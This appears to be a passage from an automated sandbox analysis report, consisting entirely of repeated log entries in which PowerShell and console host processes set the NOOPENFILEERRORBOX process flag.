                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
